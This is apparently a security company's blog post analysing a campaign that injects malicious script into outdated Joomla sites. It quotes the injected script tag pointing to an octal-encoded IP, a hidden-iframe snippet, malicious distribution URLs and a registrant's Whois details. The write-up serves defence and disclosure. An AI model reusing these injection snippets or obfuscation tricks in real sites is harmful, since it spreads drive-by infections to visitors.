Malware week – 0133.0331.0242.0033, javadisplay and more

Very busy week in terms of malware. First Hilary Kneber decided to make a come back, inlovebot.com and crazymasya.com reinfected a lot of sites, and now many outdated Joomla sites are being infected with malware from 0133.0331.0242.0033 (yes, the IP address 91.217.162.27 in octal).

This is the code added to the hacked sites:

<script src="http://0133.0331.0242.0033/0132.js" >..


This is being used to load a malicious iframe from external web sites ( javadisplay.com, mainborder.com, etc):

document . write("<iframe src="http://mainborder.com/in.cgi?2" width =`1`…

This iframe then tries to infect the computer using multiple vulnerabilities (in Java, PDF, flash, etc). These are some of the domains being used to distribute the malware:

http://mainborder.com/in.cgi?2

http://javadisplay.com/in.cgi?2

http://91.217.162.34/in.cgi?2

This is the Whois info for those domains:

Registrant:
N/A
Vladimir Fedorov (feodorovv_vla29@gmail.com)
9 Ivana Babushkina st. app.34
Moscow
Moskovskaya oblast,117292
RU
Tel. +495.5947419

If you are using Joomla, make sure it is updated to the latest version and properly monitored. If you site is currently infected, you can sign up here to get it cleaned up / secured.

If you have any question, let us know.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.